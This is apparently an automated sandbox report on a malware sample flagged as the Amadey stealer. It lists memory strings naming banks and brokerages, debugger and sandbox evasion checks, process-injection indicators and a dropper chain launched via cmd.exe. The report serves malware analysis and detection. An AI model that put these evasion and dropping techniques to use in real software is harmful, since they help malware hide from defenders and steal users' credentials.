Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: xVBoxService.exe
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 624f4d727e.exe, 00000018.00000002.2899807297.000000000264F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: firefox.exe, 0000001E.00000003.2957174991.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC6A2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: VBoxService.exe
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 0000001B.00000002.3277320082.0000000001EA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: VMWare
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: firefox.exe, 0000001E.00000003.2957174991.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC6A2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Code function: 5_2_04D401D4 Start: 04D404E5 End: 04D40224 5_2_04D401D4
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Code function: 5_2_04D40CDC rdtsc 5_2_04D40CDC
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C5DB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C5DB1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C78AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 8016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 6648, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAKKKFBGDHJ.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAKKKFBGDHJ.exe "C:\Users\userAKKKFBGDHJ.exe" Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: bdb44f72d9.exe, 00000017.00000002.3241866502.0000000000372000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3241111543.0000000000372000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RoamingCFCGIIEHIE.exe, RoamingCFCGIIEHIE.exe, 00000005.00000002.2234128926.000000000054C000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, explorti.exe, 00000009.00000002.2272766960.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000A.00000002.2271816286.000000000058C000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Program Manager
Source: userAKKKFBGDHJ.exe, userAKKKFBGDHJ.exe, 00000008.00000002.2311861747.000000000022E000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000010.00000002.2340574498.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000012.00000002.3243966824.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: ,cDProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB341 cpuid 0_2_6C5DB341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 19.2.explorti.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.axplong.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.userAKKKFBGDHJ.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.axplong.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RoamingCFCGIIEHIE.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorti.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.2223307017.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2311565762.0000000000041000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2231516085.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2272266422.00000000003A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2671470506.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2299903441.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2193493268.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2229306012.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2233910747.0000000000361000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2270763682.00000000003A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
